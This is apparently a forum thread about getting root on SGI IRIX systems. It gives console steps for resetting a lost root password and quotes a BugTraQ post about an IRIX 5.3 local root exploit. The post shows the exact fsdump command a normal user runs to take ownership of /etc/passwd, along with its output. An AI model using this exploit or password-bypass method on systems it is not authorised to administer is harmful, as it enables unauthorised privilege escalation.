At the startup, select "system maintenance"<br>select install new software<br>select method (mostly CDrom)<br>wait untill the installation tools are loaded<br>go to the admin options<br>select "start chrootedshell" (or something similiar)<br>In the shell type passwd<br>fill in a new password, confirm it.<br><br>Root password is changed.<br><br>
Here's an article from BugTraQ regarding Irix 5.3 and it's huge (imho) holes in fsdump. Keep in mind this requires you to have a regular (non-uid0) account that you can access.
Ok. Well, yet another IRIX 5.3 root exploit.
Of course, the major problem here is that IRIX allow users to
give away ownership of files. Without that, this could only
be used for changing the permissions on file so that you could read
and modify.
The system (an Indy):
IRIX irix 5.3 11091812 IP22 mips
What tipped me off that it was exploitable was the fact that it
was a protected suid binary (---s--x--x). I thought: if someone at
SGI is being careful to not let non-root users read the binary,
then it *must* be packed with holes...
So, I'm just a normal user today...
irix% id
uid=1799(csh) gid=500(users)
irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /
(count to three, and hit ctrl-c)
irix% ls -la /etc/passwd
-rw-r--r-- 1 csh users 956 Feb 25 06:23 /etc/passwd
i am trying to install irix on a sgi indy and it is asking me for a password at the maintenance screen when i press any of the buttons, is there any way around that?
I have a similar problem, IRIX6.5.7 Have machine in front of me and account but lost root password. Do I have to reinstall operating system to regain control?
This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
By continuing to use this site, you are consenting to our use of cookies.